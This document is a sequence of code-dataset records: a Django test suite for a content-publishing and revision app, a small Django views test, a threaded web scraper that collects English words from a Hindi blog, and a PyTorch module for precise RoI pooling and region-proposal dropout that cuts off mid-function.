Article(Publishing):\n \"\"\"\n A sample article model that subclasses Publishing\n \"\"\"\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = models.TextField()\n \n create_date = models.DateTimeField(default=datetime.datetime.now)\n update_date = models.DateTimeField(auto_now=True)\n publish_date = models.DateTimeField(default=datetime.datetime.now)\n\n class PublishingMeta:\n date_field = 'publish_date'\n \n def __unicode__(self):\n return self.title\n \n \nclass ArticleAdmin(PublishingAdmin):\n pass \nadmin.site.register(Article, ArticleAdmin)\n \nclass Story(Publishing):\n \"\"\"\n A sampe story model that subclasses Publishing with a few custom meta options\n \"\"\"\n title = models.CharField(max_length=255)\n slug = models.SlugField(unique=True)\n body = 
models.TextField()\n    \n    create_date = models.DateTimeField(default=datetime.datetime.now)\n    update_date = models.DateTimeField(auto_now=True)\n    \n    class PublishingMeta:\n        date_field_attr = \"published_date\"\n        date_field_verbose_name = \"Pub Date\"\n        date_field_help_text = \"Use this field to publish stories!\"\n    \n    def __unicode__(self):\n        return self.title\n    \nclass StoryAdmin(PublishingAdmin):\n    pass \nadmin.site.register(Story, StoryAdmin)\n    \n    \nclass Gallery(models.Model):\n    \"\"\"\n    A sample gallery model that does not subclass Publishing but still \n    registers with Publishing\n    \"\"\"\n    title = models.CharField(max_length=255)\n    slug = models.SlugField(unique=True)\n    body = models.TextField()\n    \n    create_date = models.DateTimeField(default=datetime.datetime.now)\n    update_date = models.DateTimeField(auto_now=True)\n    publish_date = models.DateTimeField(default=datetime.datetime.now)\n    \n    def __unicode__(self):\n        return self.title \n\nadmin.site.register(Gallery) \nregister(Gallery, admin=True)\n\nclass Photo(models.Model):\n    \"\"\"\n    A sample photo model that does not use Publishing at all.\n    \"\"\"\n    title = models.CharField(max_length=255)\n    slug = models.SlugField(unique=True)\n    body = models.TextField()\n    \n    create_date = models.DateTimeField(default=datetime.datetime.now)\n    update_date = models.DateTimeField(auto_now=True)\n    \n\nclass Content(Publishing):\n    title = models.CharField(max_length=255)\n    slug = models.SlugField(unique=True)\n    body = models.TextField()\n    \n    create_date = models.DateTimeField(default=datetime.datetime.now)\n    update_date = models.DateTimeField(auto_now=True)\n    publish_date = models.DateTimeField(default=datetime.datetime.now)\n    expired_date = models.DateTimeField(null=True, blank=True)\n    \n    class Meta:\n        abstract = True\n    \n    class PublishingMeta:\n        date_field = 'publish_date'\n        expired_field = 'expired_date'\n    \n    \nclass NewStory(Content):\n    sub_title = models.CharField(max_length=255)\n    \n    \nclass AnotherStory(Content):\n    \n    class Meta:\n        abstract = True\n    \n    class PublishingMeta:\n        date_field_attr = \"another_story_publish_date\"\n\n\nclass YetAnotherStory(AnotherStory):\n    pass\n    \n\nclass PublishingBaseTest(TestCase):\n    \"\"\"\n    Tests for ngs-publishing\n    \"\"\"\n    # fixtures = ['test_articles.json']\n    \n    def setUp(self):\n        \n        # Create some records for testing using reversion, the reason these \n        # are separated out is so reversion creates a revision per object,\n        # otherwise it would only create one revision for all three instances.\n        with create_revision():\n            self.article = Article.objects.create(title=\"Article 001\", slug=\"article-001\", body=\"article body\")\n        \n        with create_revision():\n            self.story = Story.objects.create(title=\"Story 001\", slug=\"story-001\", body=\"story body\")\n        \n        with create_revision():\n            self.gallery = Gallery.objects.create(title=\"Gallery 001\", slug=\"gallery-001\", body=\"gallery body\")\n        \n        with create_revision():\n            self.newstory = NewStory.objects.create(title=\"NewStory 001\", slug=\"newstory-001\", body=\"newstory body\", sub_title=\"newstory subtitle\")\n        \n        # the photo record is not using reversion\n        self.photo = Photo.objects.create(title=\"Photo 001\", slug=\"photo-001\", body=\"photo body\")\n    \n    \nclass PublishingTest(PublishingBaseTest):\n    \n    def test_01_subclassing(self):\n        \n        # Ensure our subclass contains the correct options and manager attributes\n        self.assertTrue(hasattr(Article, '_publishing_meta'))\n        self.assertTrue(isinstance(Article._publishing_meta, PublishingOptions))\n        \n        
self.assertTrue(hasattr(Article, 'publishing'))\n        self.assertTrue(isinstance(Article.publishing, models.Manager))\n        \n        self.assertTrue(hasattr(Article, '_publishing_manager'))\n        self.assertTrue(isinstance(Article._publishing_manager, models.Manager))\n    \n    def test_02_subclassing_fields(self):\n        \n        # Ensure our subclass contains the two required fields\n        self.assertTrue(hasattr(self.article, 'publishing_is_published'))\n        self.assertTrue(hasattr(self.article, 'publishing_status'))\n        \n        # Make sure the publishing meta knows there is no expiration date and \n        # the model did not receive the field.\n        self.assertFalse(self.article._publishing_meta.has_expired)\n        self.assertFalse(hasattr(self.article, 'publishing_expiration_date'))\n    \n    def test_03_subclassing_created_fields(self):\n        # The story model registered with publishing with no existing date \n        # fields so we need to make sure they were created with the custom \n        # values it supplied\n        self.assertTrue(hasattr(self.story, 'published_date'))\n        self.assertFalse(hasattr(self.story, 'publishing_publication_date'))\n        \n        field = self.story._meta.get_field('published_date')\n        # Make sure the verbose name and help text were also set correctly\n        self.assertEqual(field.verbose_name, \"Pub Date\")\n        self.assertEqual(field.help_text, \"Use this field to publish stories!\")\n    \n    def test_04_non_subclassing(self):\n        \n        # If a register method was used instead of subclassing Publishing \n        # the same bits should be available.\n        self.assertTrue(hasattr(Gallery, '_publishing_meta'))\n        self.assertTrue(hasattr(Gallery, 'publishing'))\n        \n        self.assertTrue(hasattr(self.gallery, 'publishing_is_published'))\n        self.assertTrue(hasattr(self.gallery, 'publishing_status'))\n        \n        # Ensure gallery has the publishing methods as well\n        self.assertTrue(hasattr(self.gallery, 'versions'))\n        self.assertTrue(hasattr(self.gallery, 'last_version'))\n        self.assertTrue(hasattr(self.gallery, 'modified_versions'))\n        self.assertTrue(hasattr(self.gallery, 'published_version'))\n    \n    def test_05_subclassing_abstract(self):\n        \n        # Ensure that publishing options defined on an abstract parent are \n        # carried over to the subclass. It should not contain \n        # the default date fields as the parent class defines them.\n        self.assertFalse(hasattr(NewStory, 'publishing_published_date'))\n        self.assertFalse(hasattr(NewStory, 'publishing_expiration_date'))\n        \n        # Ensure that the publishing date fields are the same as the \n        # parent class\n        self.assertEqual(NewStory._publishing_meta.date_field, \"publish_date\")\n        self.assertEqual(NewStory._publishing_meta.expired_field, \"expired_date\")\n        \n        # Taking this too far?
YetAnotherStory subclasses an abstract model \n        # AnotherStory which inherits from another abstract model Content\n        # YetAnotherStory does not define any publishing options, the options \n        # are taken from AnotherStory and NOT Content\n        self.assertEqual(YetAnotherStory._publishing_meta.date_field, \"another_story_publish_date\")\n        # Since only the options from the direct parent were taken, the \n        # expired date field is the default, since AnotherStory does not \n        # define it.\n        self.assertEqual(YetAnotherStory._publishing_meta.expired_field, \"publishing_expiration_date\")\n    \n    def test_05_datefield_creation(self):\n        \n        # Ensure that a registered model (Gallery) with no publishing \n        # options specified did receive the date fields\n        self.assertTrue(hasattr(self.gallery, 'publishing_publication_date'))\n        self.assertTrue(hasattr(self.gallery, 'publishing_expiration_date'))\n    \n    def test_06_manager(self):\n        \n        # Should return 0 articles because we have not published anything yet\n        articles = Article.publishing.all()\n        self.assertEqual(len(articles), 0)\n        \n        # Publish the article\n        Article.publishing.publish(self.article)\n        \n        # The default queryset now should return the 1 item we published\n        articles = Article.publishing.all()\n        self.assertEqual(len(articles), 1)\n        \n        # Ensure we cannot publish models that are not publishable. In this \n        # case we are using the Article publishing manager to try and publish \n        # a photo, which is wrong.\n        self.assertRaises(ValueError, Article.publishing.publish, self.photo)\n        \n        # The gallery was not subclassed, so we need to make sure all the same \n        # functionality is available as well\n        galleries = Gallery.publishing.all()\n        self.assertEqual(len(galleries), 0)\n    \n    def test_07_reversion(self):\n        \n        # Ensure that our 3 models are registered with reversion automatically\n        for model in [Article, Story, Gallery]:\n            self.assertTrue(model in get_registered_models())\n    \n    \nclass PublishingMethodTests(PublishingBaseTest):\n    \n    def test_01_versions(self):\n        \n        # Initially there should be only one version\n        self.assertEqual(len(self.article.versions), 1)\n        \n        # Change the title, and use reversion to create a revision\n        self.article.title = \"%s - Changed\" % self.article.title\n        with create_revision():\n            self.article.save()\n        \n        # Now we should receive two versions\n        self.assertEqual(len(self.article.versions), 2)\n        \n        # Ensure the gallery's versions method works\n        self.assertEqual(len(self.gallery.versions), 1)\n    \n    \n    def test_02_last_version(self):\n        \n        # The last version should be the initially saved version, we check \n        # the title to ensure it's the same\n        self.assertEqual(self.article.last_version.object.title, \"Article 001\")\n        \n        # Change the title of the article and save a new version\n        self.article.title = \"Article 001 Changed\"\n        \n        with create_revision():\n            self.article.save()\n        \n        # Ensure that the last version returns the article with the new title\n        self.assertEqual(self.article.last_version.object.title, \"Article 001 Changed\")\n        \n        # Ensure the gallery's method works\n        self.assertEqual(self.gallery.last_version.object.title, \"Gallery 001\")\n    \n    def test_03_modified_versions(self):\n        \n        # The initial version is not considered \"modified\"\n        self.assertEqual(len(self.article.modified_versions), 0)\n\n        self.article.title = \"Article 001 Changed\"\n        \n        with create_revision():\n            self.article.save()\n        \n        # Ensure we now have one modified version of the article\n        self.assertEqual(len(self.article.modified_versions), 1)\n        \n        # Ensure the gallery's method 
works\n        self.assertEqual(len(self.gallery.modified_versions), 0)\n    \n    def test_04_published_version(self):\n        # Should not be any published versions yet\n        self.assertEqual(self.article.published_version, None)\n        \n        with create_revision():\n            Article.publishing.publish(self.article)\n        \n        # Should be one published version now\n        self.assertEqual(self.article.published_version, self.article)\n        \n        # Let's make another version but set it to draft\n        self.article.title = \"%s - Changed\" % self.article.title\n        # Setting the status to draft is necessary here because we \n        # want to ensure we receive the correct published version\n        self.article.publishing_status = DRAFT_STATUS\n        \n        with create_revision():\n            self.article.save()\n        \n        # This test will ensure that our title change is not part of the \n        # published version of the article.\n        self.assertEqual(self.article.published_version.title, \"Article 001\")\n        \n        # Ensure the gallery's method works\n        self.assertEqual(self.gallery.published_version, None)\n        \n        with create_revision():\n            Gallery.publishing.publish(self.gallery)\n\n        # Should be one published version now\n        self.assertEqual(self.gallery.published_version, self.gallery)\n\nclass PublishingInfoTests(PublishingBaseTest):\n    \n    def test_01_meta_info(self):\n        # Ensure each test content object contains one meta info record\n        last_article_version = self.article.last_version\n        last_story_version = self.story.last_version\n        last_gallery_version = self.gallery.last_version\n\n        article_info_count = last_article_version.revision.revisionpublishinginfo_set.all().count()\n        story_info_count = last_story_version.revision.revisionpublishinginfo_set.all().count()\n        gallery_info_count = last_gallery_version.revision.revisionpublishinginfo_set.all().count()\n        \n        self.assertEqual(article_info_count, 1)\n        self.assertEqual(story_info_count, 1)\n        self.assertEqual(gallery_info_count, 1)\n    \n    def test_02_extra_info(self):\n        \n        self.article.title = \"Article 001 Changed\"\n        \n        with create_revision():\n            self.article.save()\n        \n        # Should now be 2 versions of the article\n        info_count = self.article.versions.count()\n        self.assertEqual(info_count, 2)\n        \n        # Ensure that the gallery works the same\n        info_count = self.gallery.versions.count()\n        self.assertEqual(info_count, 1)\n        \n        self.gallery.title = \"Gallery 001 Changed\"\n        \n        with create_revision():\n            self.gallery.save()\n        \n        info_count = self.gallery.versions.count()\n        self.assertEqual(info_count, 2)\n    \n    \nclass PublishingAdminTests(PublishingBaseTest):\n    \n    fixtures = ['test_users.json']\n    urls = \"publishing.test_urls\"\n    \n    def setUp(self):\n        super(PublishingAdminTests, self).setUp()\n        self.client = Client()\n    \n    def test_01_publishing_admin(self):\n        \n        # Ensure the gallery was supplied with the correct subclass\n        gallery_admin = admin.site._registry[Gallery].__class__\n        # Ensure the registered gallery did get the subclass PublishingAdmin\n        self.assertTrue(issubclass(gallery_admin, PublishingAdmin))\n    \n    def test_02_admin_urls(self):\n        \n        self.client.login(username='user', password='pass')\n        \n        # Ensure the subclassed models are in the admin\n        response = self.client.get('/admin/publishing/article/')\n        self.assertEqual(response.status_code, 200)\n        \n        # Ensure the non-subclassed models have an admin also\n        response = self.client.get('/admin/publishing/gallery/')\n        self.assertEqual(response.status_code, 200)\n    \n    def test_03_admin_publishing(self):\n        \n        from django.contrib.formtools.tests import DummyRequest\n        request = DummyRequest(POST={'_publishing_publish': ''})\n        \n        # 
Get the article admin\n        article_admin = admin.site._registry[Article]\n        \n        self.assertEqual(self.article.published_version, None)\n        # Call the save model, which should trigger the publishing of the article.\n        with create_revision():\n            article_admin.save_model(request, self.article, None, None)\n        self.assertEqual(self.article.published_version, self.article)\n        \n        # Do the same thing with the gallery model\n        gallery_admin = admin.site._registry[Gallery]\n        \n        self.assertEqual(self.gallery.published_version, None)\n        with create_revision():\n            gallery_admin.save_model(request, self.gallery, None, None)\n        self.assertEqual(self.gallery.published_version, self.gallery)\n        \n        # Do the same thing with the story model\n        story_admin = admin.site._registry[Story]\n        \n        self.assertEqual(self.story.published_version, None)\n        with create_revision():\n            story_admin.save_model(request, self.story, None, None)\n        self.assertEqual(self.story.published_version, self.story)\n    \n    ", "sub_path": "publisher/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 17480, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "models.Publishing", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute"}, {"api_name": "admin.PublishingAdmin", "line_number": 36, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}, {"api_name": "models.Publishing", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name":
"django.db.models.DateTimeField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "admin.PublishingAdmin", "line_number": 59, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 61, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 64, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 69, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 70, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 71, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 73, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 73, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 73, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 74, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.contrib.admin.site.register", "line_number": 80, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 80, "usage_type": "name"}, {"api_name": "publishing.register", "line_number": 81, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 87, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 87, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 88, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 88, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 91, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 92, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Publishing", "line_number": 95, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 96, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 96, "usage_type": "name"}, {"api_name": "django.db.models.SlugField", "line_number": 97, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 97, 
"usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 98, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 100, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 100, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 101, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 101, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 102, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 102, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 102, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 103, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 103, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 114, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 130, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 141, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 144, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 147, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 150, "usage_type": "call"}, {"api_name": "options.PublishingOptions", "line_number": 163, "usage_type": "argument"}, {"api_name": "django.db.models.Manager", "line_number": 166, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 166, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 169, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 169, "usage_type": "name"}, {"api_name": "reversion.get_registered_models", "line_number": 267, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 279, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 298, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 314, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 327, "usage_type": "call"}, {"api_name": "models.DRAFT_STATUS", "line_number": 337, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 339, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 349, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 375, "usage_type": "call"}, {"api_name": "reversion.create_revision", "line_number": 388, "usage_type": "call"}, {"api_name": "django.test.client.Client", "line_number": 402, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 407, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 407, "usage_type": "name"}, {"api_name": "admin.PublishingAdmin", "line_number": 409, "usage_type": "argument"}, {"api_name": "django.contrib.formtools.tests.DummyRequest", "line_number": 426, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 429, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 429, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 433, "usage_type": 
"call"}, {"api_name": "django.contrib.admin.site", "line_number": 438, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 438, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 441, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 446, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 446, "usage_type": "name"}, {"api_name": "reversion.create_revision", "line_number": 449, "usage_type": "call"}]} +{"seq_id": "275392417", "text": "from django.urls import reverse\nfrom django.test import Client, TestCase\n\n\nclass TestViews(TestCase):\n \"\"\"\n Testing http code (200) and template chosen for each view.\n \"\"\"\n def setUp(self):\n self.client = Client()\n\n def test_general_sites_view(self):\n \"\"\"\n Testing the general view of websites\n \"\"\"\n url = reverse(\"general-sites\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response,\n \"websites_monitoring/sites.html\")\n\n def test_summary_average(self):\n \"\"\"\n Testing the average summary view\n \"\"\"\n url = reverse(\"summary-average\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response,\n \"websites_monitoring/summary-average.html\")\n\n def test_summary_sum(self):\n \"\"\"\n Testing the sum summary view\n \"\"\"\n url = reverse(\"summary-sum\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \n \"websites_monitoring/summary.html\")\n", "sub_path": "application_task/websites_monitoring/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1268, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 5, "usage_type": "name"}, {"api_name": "django.test.Client", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "114683690", "text": "import requests\nimport re\nimport threading\nfrom bs4 import BeautifulSoup\n\n\nseed_link = \"https://www.hindimehelp.com/\"\nwords_array = set()\n\n\ndef check_word_array(word_arr):\n\tglobal words_array\n\ttemp_array = []\n\tfor item in words_array :\n\t\tif re.match('^[a-zA-z]+$', item) :\n\t\t\ttemp_array.append(item)\n\t\telse :\n\t\t\tpass\n\twords_array = temp_array\n\n\n\ndef save_in_file(word_arr):\n with open(\"hindimehelp_words.txt\", \"a\") as f :\n for word in word_arr :\n \t# print(\"????/?? 
\" + word)\n \tf.write(word + \"\\n\")\n\ndef scrape_article_page(url):\n\tprint(\"------- article page \" + url) \n\tpage = requests.get(url)\n\tpage.encoding= 'utf-8'\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\tx = soup.select(\"div[class='td-post-content']\")\n\tfor each in x :\n\t\ttext = each.get_text().replace(\"\\n\", \" \")\n\t\tword_arr = set(re.split('\\W+', text))\n\n\t\ttemp_array = []\n\t\tfor item in word_arr :\n\t\t\tif re.match('^[a-zA-z]+$', item) :\n\t\t\t\ttemp_array.append(item)\n\t\t\telse :\n\t\t\t\tpass\n\t\tword_arr = temp_array\n\t\tsave_in_file(word_arr)\n\n\ndef scrape_list_page(url):\n page = requests.get(url)\n page.encoding= 'utf-8'\n soup = BeautifulSoup(page.text, 'html.parser')\n\n x = soup.select(\"h3[class='entry-title td-module-title'] a \")\n detail_page = []\n for each in x :\n detail_page.append(each.get(\"href\"))\n\n threadList = []; \n for article in detail_page :\n t = threading.Thread(target=scrape_article_page, args=(article,));\n t.start();\n threadList.append(t);\n\n for thread in threadList:\n \tthread.join(); \n\ncount = 47\nfor i in range(47):\n\tif i == 0 :\n\t\tlink = seed_link\n\telse :\n\t\tlink = seed_link + \"page/\" + str(i)\n\tscrape_list_page(link)\n", "sub_path": "scrape/hindimehelp.py", "file_name": "hindimehelp.py", "file_ext": "py", "file_size_in_byte": 1676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "re.match", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 33, "usage_type": "call"}, {"api_name": "re.split", "line_number": 37, "usage_type": "call"}, {"api_name": "re.match", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 52, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "482339552", "text": "from types import MethodType\n\nimport torch\nfrom torch import nn\nfrom torchvision import models\nfrom torchvision import transforms\nfrom torchvision.ops.poolers import MultiScaleRoIAlign\n\nfrom prroi_pool.functional import prroi_pool2d, _import_prroi_pooling\n\n_import_prroi_pooling()\n\nclass MultiScalePrRoIAlign(MultiScaleRoIAlign):\n def forward(self, x, boxes, image_shapes):\n \"\"\"\n Arguments:\n x (OrderedDict[Tensor]): feature maps for each level. They are assumed to have\n all the same number of channels, but they can have different sizes.\n boxes (List[Tensor[N, 4]]): boxes to be used to perform the pooling operation, in\n (x1, y1, x2, y2) format and in the image reference size, not the feature map\n reference.\n image_shapes (List[Tuple[height, width]]): the sizes of each image before they\n have been fed to a CNN to obtain feature maps. 
This allows us to infer the\n scale factor for each one of the levels to be pooled.\n Returns:\n result (Tensor)\n \"\"\"\n x = [v for k, v in x.items() if k in self.featmap_names]\n num_levels = len(x)\n rois = self.convert_to_roi_format(boxes)\n if self.scales is None:\n self.setup_scales(x, image_shapes)\n\n if num_levels == 1:\n return prroi_pool2d(\n x[0], rois,\n self.output_size[0],\n self.output_size[1],\n self.scales[0],\n # sampling_ratio=self.sampling_ratio\n )\n\n levels = self.map_levels(boxes)\n\n num_rois = len(rois)\n num_channels = x[0].shape[1]\n\n dtype, device = x[0].dtype, x[0].device\n result = torch.zeros(\n (num_rois, num_channels,) + self.output_size,\n dtype=dtype,\n device=device,\n )\n\n for level, (per_level_feature, scale) in enumerate(zip(x, self.scales)):\n idx_in_level = torch.nonzero(levels == level).squeeze(1)\n rois_per_level = rois[idx_in_level]\n\n result[idx_in_level] = prroi_pool2d(\n per_level_feature, rois_per_level,\n self.output_size[0],\n self.output_size[1],\n scale,\n # sampling_ratio=self.sampling_ratio\n )\n\n return result\n\ndef permute_and_flatten(layer, N, A, C, H, W):\n layer = layer.view(N, -1, C, H, W)\n layer = layer.permute(0, 3, 4, 1, 2)\n layer = layer.reshape(N, -1, C)\n return layer\n\ndef concat_box_prediction_layers(box_cls, box_regression):\n box_cls_flattened = []\n box_regression_flattened = []\n # for each feature level, permute the outputs to make them be in the\n # same format as the labels. Note that the labels are computed for\n # all feature levels concatenated, so we keep the same representation\n # for the objectness and the box_regression\n for box_cls_per_level, box_regression_per_level in zip(\n box_cls, box_regression\n ):\n N, AxC, H, W = box_cls_per_level.shape\n Ax4 = box_regression_per_level.shape[1]\n A = Ax4 // 4\n C = AxC // A\n box_cls_per_level = permute_and_flatten(\n box_cls_per_level, N, A, C, H, W\n )\n box_cls_flattened.append(box_cls_per_level)\n\n box_regression_per_level = permute_and_flatten(\n box_regression_per_level, N, A, 4, H, W\n )\n box_regression_flattened.append(box_regression_per_level)\n # concatenate on the first dimension (representing the feature levels), to\n # take into account the way the labels were generated (with all feature maps\n # being concatenated as well)\n box_cls = torch.cat(box_cls_flattened, dim=1).reshape(-1, C)\n box_regression = torch.cat(box_regression_flattened, dim=1).reshape(-1, 4)\n return box_cls, box_regression\n\n\ndef rpn_forward(self, images, features, targets=None, p=0.1):\n features = [nn.functional.dropout(f, p, self.training) for f in features.values()] # add dropout here\n\n objectness, pred_bbox_deltas = self.head(features)\n anchors = self.anchor_generator(images, features)\n\n num_images = len(anchors)\n num_anchors_per_level = [o[0].numel() for o in objectness]\n objectness, pred_bbox_deltas = \\\n concat_box_prediction_layers(objectness, pred_bbox_deltas)\n # apply pred_bbox_deltas to anchors to obtain the decoded proposals\n # note that we detach the deltas because Faster R-CNN does not backprop through\n # the proposals\n proposals = self.box_coder.decode(pred_bbox_deltas, anchors)\n proposals = proposals.view(num_images, -1, 4)\n boxes, scores = self.filter_proposals(proposals, objectness, images.image_sizes, num_anchors_per_level)\n\n losses = {}\n # if self.training:\n # labels, matched_gt_boxes = self.assign_targets_to_anchors(anchors, targets)\n # regression_targets = self.box_coder.encode(matched_gt_boxes, anchors)\n # 
